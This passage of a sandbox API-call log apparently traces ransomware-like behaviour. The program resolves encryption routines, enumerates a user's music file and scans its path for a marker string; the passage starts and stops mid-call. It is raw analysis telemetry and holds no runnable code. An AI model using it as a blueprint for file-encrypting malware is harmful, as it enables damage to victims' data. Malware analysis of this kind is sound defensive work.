(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.003] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.004] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.004] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.004] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.005] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.005] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0x90add8 [0187.006] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.006] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0x90add8 [0187.007] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.007] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ObhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hGwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GwH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wH4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nj0Pk.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.009] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.010] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.010] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.010] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.010] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.010] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.010] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 